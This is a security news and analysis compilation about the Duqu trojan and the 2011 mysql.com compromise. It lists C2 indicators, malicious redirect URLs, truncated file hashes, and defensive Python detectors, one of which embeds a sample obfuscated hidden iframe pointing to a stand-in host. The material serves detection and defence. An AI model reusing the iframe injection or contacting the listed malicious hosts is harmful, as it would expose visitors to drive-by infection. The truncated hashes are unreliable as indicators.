Iran Detects and Fights Back Duqu Virus in System


Iran said on Sunday it had detected the Duqu computer virus that experts say is based on Stuxnet, the so-called "cyber-weapon" discovered last year and believed to be aimed at sabotaging the Islamic Republic's nuclear sites.
The head of Iran's civil defense organization told the official IRNA news agency that computers at all main sites at risk were being checked and that Iran had developed anti-virus software to fight back the virus. "We are in the initial phase of fighting the Duqu virus," Gholamreza Jalali was quoted as saying. "The final report which says which organizations the virus has spread to and what its impacts are has not been completed yet."
While Stuxnet was aimed at crippling industrial control systems and may have destroyed some of the centrifuges Iran uses to enrich uranium, experts say Duqu appeared designed to gather data to make it easier to launch future cyber attacks. "Duqu is essentially the precursor to a future Stuxnet-like attack," Symantec said in a report last month, adding that instead of being designed to sabotage an industrial control system, the new virus could gain remote access capabilities.
Iran also said in April that it had been targeted by a second computer virus, which it called "Stars". It was not clear if Stars and Duqu were related but Jalali had described Duqu as the third virus to hit Iran.
Iran has developed a software program that can "control" the newly discovered Duqu spyware, the director of Iran's Passive Defense Organization has announced. "The software, capable of controlling this virus (Duqu), has been provided to organizations and institutions," IRNA quoted Brigadier General Gholamreza Jalali as saying on Sunday. In July, media reports claimed that Stuxnet had targeted industrial computers around the globe, with Iran being the main target of the attack. The reports said Iran's newly launched Bushehr nuclear power plant was at the center of the cyber attack. However, Iranian experts detected the worm in time, averting any damage to the country's industrial sites and resources.

"The (Iranian) cyber defense base is working round the clock to adopt the necessary measures to counter cyber attacks and the infiltration of spyware," Jalali stated.

Exploring the Duqu Bot


The Duqu trojan is composed of several malicious files that work together for a malicious purpose. The first component is a Windows kernel driver that searches for and loads encrypted dynamic link library (DLL) files. The decrypted DLL files implement the main payload of Duqu, which is a remote access trojan (RAT). The RAT allows an adversary to gather information from a compromised computer and to download and run additional programs.

Duqu vs Stuxnet

Attribute                         | Duqu                                     | Stuxnet
----------------------------------+------------------------------------------+------------------------------------------
Infection Methods                 | Unknown                                  | USB (Universal Serial Bus);
                                  |                                          | PDF (Portable Document Format)
Dropper Characteristics           | Installs signed kernel drivers to        | Installs signed kernel drivers to
                                  | decrypt and load DLL files               | decrypt and load DLL files
Zero-days Used                    | None yet identified                      | Four
Command and Control               | HTTP, HTTPS, Custom                      | HTTP
Self Propagation                  | None yet identified                      | P2P (Peer to Peer) using RPCs (Remote
                                  |                                          | Procedure Call); Network Shares;
                                  |                                          | WinCC Databases (Siemens)
Data Exfiltration                 | Add-on, keystroke logger for user and    | Built-in, used for versioning and
                                  | system info stealing                     | updates of the malware
Date triggers to infect or exit   | Uninstalls self after 36 days            | Hard coded, must be in the following
                                  |                                          | range: 19790509 => 20120624
Interaction with Control Systems  | None                                     | Highly sophisticated interaction with
                                  |                                          | Siemens SCADA control systems


Like Stuxnet, Duqu attacks Windows systems using a zero-day vulnerability. The installer file is a Microsoft Word (.doc) document that exploits the Win32k TrueType font parsing engine to gain code execution. Duqu targets a flaw in T2EMBED.DLL, which is the TrueType font parsing engine.

How Does Duqu Spread?

Duqu doesn't spread on its own. In one known case, Duqu was installed by a document attachment which was delivered via an e-mail message.

What are indicators of a Duqu infection?

Duqu contains a backdoor that steals information. Infostealers need to send the stolen information back somehow, and careful ones try to make the transfer look innocent in case somebody is watching network traffic. Duqu hides its traffic by making it look like normal web traffic. Administrators should monitor their network for systems attempting to resolve the C2 domain or connect to the C2 IP address given below, as a sign of possible infection.
Duqu connects to a server (206.183.111.97, a.k.a. canoyragomez.rapidns.com, which used to be hosted in India) and sends an HTTP request. The server responds with a blank JPG image, after which Duqu sends back a 56 kB JPG file called dsc00001.jpg with the stolen information (encrypted with AES) appended to the end of the image file.
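As an added example (not from the post or from any of the vendors it cites), here is a Python script that applies the two indicators just described from the defender's side: it flags clients in a DNS/proxy log that resolve the C2 host name or send requests to the C2 address, and it checks whether a JPEG file carries bytes after its end-of-image marker, which is where the post says the encrypted stolen data is appended. The log line format and all sample records are constructed; the domain and IP address are the ones quoted above.

```python
import re

# Network indicators quoted in the post above (as reported for Duqu in 2011).
DUQU_C2_DOMAIN = "canoyragomez.rapidns.com"
DUQU_C2_IP = "206.183.111.97"

# Assumed format of the constructed log lines: "<timestamp> <client> <DNS|GET|POST|CONNECT> <target>".
LOG_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(DNS|GET|POST|CONNECT)\s+(\S+)")
TARGET_HOST = re.compile(r"^(?:[a-z]+://)?([^/:]+)", re.I)

# Constructed sample: one client resolves the C2 name and then posts to the C2 address.
SAMPLE_LOG = [
    "2011-11-01T09:12:03 10.0.0.15 DNS canoyragomez.rapidns.com.",
    "2011-11-01T09:12:04 10.0.0.15 POST http://206.183.111.97/",
    "2011-11-01T09:13:10 10.0.0.22 GET http://www.example.com/index.html",
    "2011-11-01T09:14:00 10.0.0.31 DNS example.org",
]


def find_c2_contacts(lines, domain=DUQU_C2_DOMAIN, ip=DUQU_C2_IP):
    """Map each client that resolved the C2 name or sent a request to the C2 host to its reasons."""
    contacts = {}
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the assumed format; skip rather than guess
        _, client, action, target = m.groups()
        if action == "DNS":
            hit = target.lower().rstrip(".") == domain
            reason = "resolved C2 domain"
        else:
            mh = TARGET_HOST.match(target)
            host = (mh.group(1) if mh else target).lower()
            hit = host in (ip, domain)
            reason = f"{action} to C2 host {host}"
        if hit:
            contacts.setdefault(client, []).append(reason)
    return contacts


# JPEG markers: SOI opens the file, EOI closes it; anything after EOI is not image data.
JPEG_SOI = b"\xff\xd8"


def jpeg_end_offset(data):
    """Walk the JPEG segment structure and return the offset just past the EOI marker, or None if malformed."""
    if not data.startswith(JPEG_SOI):
        return None
    i, n = 2, len(data)
    while i + 1 < n:
        if data[i] != 0xFF:
            return None
        marker = data[i + 1]
        if marker == 0xD9:                              # EOI
            return i + 2
        if marker == 0xFF:                              # fill byte before a marker
            i += 1
            continue
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:    # TEM / RSTn carry no length field
            i += 2
            continue
        if i + 3 >= n:
            return None
        i += 2 + int.from_bytes(data[i + 2:i + 4], "big")   # skip the segment by its length field
        if marker == 0xDA:                              # SOS: entropy-coded data runs until a non-stuffed marker
            while i + 1 < n:
                if data[i] == 0xFF and data[i + 1] != 0x00 and not (0xD0 <= data[i + 1] <= 0xD7):
                    break
                i += 1
    return None


def jpeg_appended_bytes(data):
    """Bytes trailing the image (where Duqu appends its encrypted payload); None if not a well-formed JPEG."""
    end = jpeg_end_offset(data)
    return None if end is None else len(data) - end


# Constructed minimal JPEG: SOI, APP0 (JFIF), SOS with a few entropy-coded bytes (incl. a stuffed FF00), EOI.
CLEAN_JPEG = (
    b"\xff\xd8"
    + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"
    + b"\x12\x34\xff\x00\x56"
    + b"\xff\xd9"
)

if __name__ == "__main__":
    print(find_c2_contacts(SAMPLE_LOG))
    print(jpeg_appended_bytes(CLEAN_JPEG), jpeg_appended_bytes(CLEAN_JPEG + b"\x00" * 20))
```

The JPEG check walks the marker structure rather than searching for the last FF D9, because the appended ciphertext can itself contain that byte pair; a non-zero result on an image captured from a proxy or upload is worth a closer look, though legitimate tools also append metadata, so treat it as a lead rather than a verdict.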


Name                                                File Size       MD5
jminet7.sys                                         24,960 bytes    0eecd17c6c215b358b7b872b74bfd80
netp191.pnf                                         232,448 bytes   b4ac366e24204d821376653279cbad8
netp192.pnf                                         6,750 bytes     94c4ef91dfcd0c53a96fdc387f9f9c3
cmi4432.sys                                         29,568 bytes    4541e850a228eb69fd0f0e924624b24
cmi4432.pnf                                         192,512 bytes   0a566b1616c8afeef214372b1a0580c
cmi4464.pnf                                         6,750 bytes     e8d6b4dadb96ddb58775e6c85b10b6c
<unknown> (sometimes referred to as keylogger.exe)  85,504 bytes    9749d38ae9b9ddd81b50aad679ee87e
nfred965.sy                                         24,960 bytes    c9a31ea148232b201fe7cb7db5c75f5
nred961.sys                                         unknown         f60968908f03372d586e71d87fe795c
adpu321.sy                                          24,960 bytes    3d83b077d32c422d6c7016b5083b9fc
iaStor451.sys                                       24,960 bytes    bdb562994724a35a1ec5b9e85b8e054f

(The byproducts in the table have been collected from multiple Duqu variants and would not all be present on a single infected computer.)

Why "Duqu"?

The name “Duqu” was assigned to this malware because the keylogger program creates temporary files that begin with the prefix “~DQ”. A computer infected with Duqu may have files beginning with “~DQ” in Windows temporary directories.
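Added example, not a tool from the post or from the labs it cites: a Python host-triage helper that looks for the two host-side indicators the post gives, temporary files beginning with "~DQ" and files whose names match the component table above, and that can compare MD5 values against a caller-supplied list. The component name set is taken from the table (the two names printed truncated as ".sy" are left out); the demo directory tree and its file contents are constructed placeholders, not Duqu samples; and since most hashes in the table are printed with only 31 hex digits, the script takes full hashes as an assumed external input instead of using the table's values.

```python
import hashlib
import os
import shutil
import tempfile
from pathlib import Path

# Component file names from the table above (names printed truncated as ".sy" omitted).
DUQU_FILE_NAMES = {
    "jminet7.sys", "netp191.pnf", "netp192.pnf", "cmi4432.sys",
    "cmi4432.pnf", "cmi4464.pnf", "nred961.sys", "iastor451.sys",
}
DQ_PREFIX = "~DQ"  # prefix of the keylogger's temporary files, per the post

# Constructed placeholder content for the demo tree (not a real driver) and its MD5.
DEMO_DRIVER_BYTES = b"constructed placeholder, not a real driver"
DEMO_DRIVER_MD5 = hashlib.md5(DEMO_DRIVER_BYTES).hexdigest()


def md5_file(path, chunk=1 << 16):
    """MD5 of a file, streamed so large files are not read into memory at once."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def triage_directory(root, known_hashes=frozenset()):
    """Walk `root` and return (path, md5, reasons) for every file matching a Duqu indicator.

    known_hashes: full 32-hex-digit MD5 values from a trusted source (assumed input;
    the table above cannot supply them because most of its hashes are truncated).
    """
    findings = []
    for p in sorted(Path(root).rglob("*")):
        if not p.is_file():
            continue
        reasons = []
        if p.name.upper().startswith(DQ_PREFIX):       # Windows names are case-insensitive
            reasons.append("temporary file with ~DQ prefix")
        if p.name.lower() in DUQU_FILE_NAMES:
            reasons.append("name matches a known Duqu component")
        # Hash only when a name already matched or when there is a hash list to compare against.
        digest = md5_file(p) if (reasons or known_hashes) else None
        if digest is not None and digest in known_hashes:
            reasons.append("MD5 matches a known Duqu hash")
        if reasons:
            findings.append((str(p), digest, reasons))
    return findings


def build_demo_tree():
    """Create a throwaway directory with constructed files and return its path."""
    root = tempfile.mkdtemp(prefix="duqu-triage-demo-")
    drivers = Path(root, "drivers")
    drivers.mkdir()
    Path(root, "~DQ1234.tmp").write_bytes(b"constructed keylogger scratch file")
    Path(drivers, "jminet7.sys").write_bytes(DEMO_DRIVER_BYTES)
    Path(root, "notes.txt").write_bytes(b"benign file")
    return root


def demo(known_hashes=frozenset()):
    """Triage the constructed tree and return (file name, reasons) pairs, then remove the tree."""
    root = build_demo_tree()
    try:
        return [(os.path.basename(path), reasons)
                for path, _, reasons in triage_directory(root, known_hashes)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for name, reasons in demo({DEMO_DRIVER_MD5}):
        print(name, "->", "; ".join(reasons))
```

On a real host the roots to pass are the Windows temporary directories (for the "~DQ" files) and the drivers directory (for the .sys names); a name match alone is a weak signal, since these are ordinary-looking driver names, so the hash comparison is what turns a hit into a confirmed indicator.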


Duqu Malware Detection Tool


The Free Duqu Detector Toolkit comes from the CrySyS Lab at the Budapest University of Technology and Economics, which was the first group to discover Duqu, as well as to discover a dropper file (installer) for Duqu that offered additional clues into how the malware would have infected computers and spread. Notably, the installer recovered by CrySyS was a malicious Word document (.doc) file, although security researchers said the malware may have been spread through other means as well.
CrySyS said its toolkit, which includes four command-line-executable components, intentionally includes "very simple, easy-to-analyze program source code, to check that there is no backdoor or malicious code inside." That way, potential users can easily validate the source code before using it in highly specialized environments.
To date, Microsoft has detailed a workaround for the zero-day vulnerability that researchers unearthed in the Duqu source code, which involves a font parsing flaw in the TrueType engine in 32-bit versions of Windows. That vulnerability would have helped the malware to spread and infect its target without being detected. But Microsoft has yet to issue a patch that fixes the flaw exploited by Duqu.


Mysql.com Hacked , Infected with JavaScript Malware



mysql.com has been hacked and is currently serving malware to visitors, according to a report by Armorize. The company detected the malware using its malware monitoring platform, HackAlert. The mysql.com website has been injected with a script that generates an iFrame redirecting visitors to http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php, where the BlackHole exploit pack is hosted.


How Does the Injection Work?


Step 1: http://www.mysql.com

Causes the visiting browser to load the following:

Step 2: http://mysql.com/common/js/s_code_remote.js?ver=20091011 (do not visit)

This is the injection point. The entire content of the .js file was published with the original report.


The Infection Section



Step 3:  http://falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http://mysql.com/

Returns a 302 redirect to Step 4.

Step 4: http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php

This domain hosts the BlackHole exploit pack. It exploits the visitor's browsing platform (the browser and browser plugins such as Adobe Flash, Adobe PDF, Java, etc.) and, upon successful exploitation, permanently installs a piece of malware on the visitor's machine without the visitor's knowledge. The visitor doesn't need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.
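Added example, not code from Armorize, Sucuri or the original post: a small Python checker for the kind of injection described above, a script that writes a hidden iframe pointing at an off-site URL. It first decodes unescape('%3C...') wrappers, a common way such injections are obfuscated, then flags any iframe whose source host is not the site's own or whose size or style makes it invisible. The sample script, the /common/banner.html path and the example-redirector.invalid host are constructed; the real redirect domains from the post are not used.

```python
import re
from urllib.parse import unquote, urlparse

UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.I)
SRC_ATTR = re.compile(r"\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
DIM_ATTR = re.compile(r"\b(width|height)\s*=\s*['\"]?(\d+)", re.I)
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

# Constructed sample script: one legitimate same-site iframe, one obfuscated off-site 1x1 iframe.
SAMPLE_JS = r"""
/* constructed sample, not the real s_code_remote.js */
var s_account = "examplesite";
s.pageName = document.title;
document.write('<iframe src="/common/banner.html" width="300" height="100"></iframe>');
document.write(unescape('%3Ciframe src=%22http://example-redirector.invalid/main.php%22 width=1 height=1 style=%22visibility:hidden%22%3E%3C/iframe%3E'));
"""


def decode_unescape(js_text):
    """Replace unescape('...') calls with their decoded string so the tag regexes can see the markup.

    Only %XX escapes are handled; JavaScript's unescape also accepts %uXXXX, which unquote() leaves as-is.
    """
    return UNESCAPE_CALL.sub(lambda m: unquote(m.group(2)), js_text)


def same_site(host, site_host):
    """True if `host` is the site itself or one of its subdomains."""
    return host == site_host or host.endswith("." + site_host)


def find_suspicious_iframes(js_text, site_host):
    """Return one record per iframe that points off-site or is styled/sized to be invisible."""
    findings = []
    text = decode_unescape(js_text)
    for tag in IFRAME_TAG.finditer(text):
        attrs = tag.group(1)
        src = SRC_ATTR.search(attrs)
        if not src:
            continue
        url = src.group(1)
        host = urlparse(url).hostname          # None for a relative URL, i.e. same site
        external = host is not None and not same_site(host, site_host)
        dims = [int(v) for _, v in DIM_ATTR.findall(attrs)]
        hidden = bool(HIDDEN_STYLE.search(attrs)) or any(v <= 1 for v in dims)
        if external or hidden:
            findings.append({"url": url, "external": external, "hidden": hidden})
    return findings


if __name__ == "__main__":
    for hit in find_suspicious_iframes(SAMPLE_JS, "mysql.com"):
        print(hit)
```

Run against a copy of a site's served JavaScript, compared with the version in source control, this separates the expected same-site frames from anything that was added: a 1x1 or hidden frame to a host the site does not own is exactly the pattern the redirect chain above starts with.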

Sucuri Security researchers have also confirmed this. According to them, "the site has been compromised via JavaScript malware that infects a web site through a compromised desktop (with virus), where it steals any stored password from the FTP client and uses that to attack the site."



[Source]


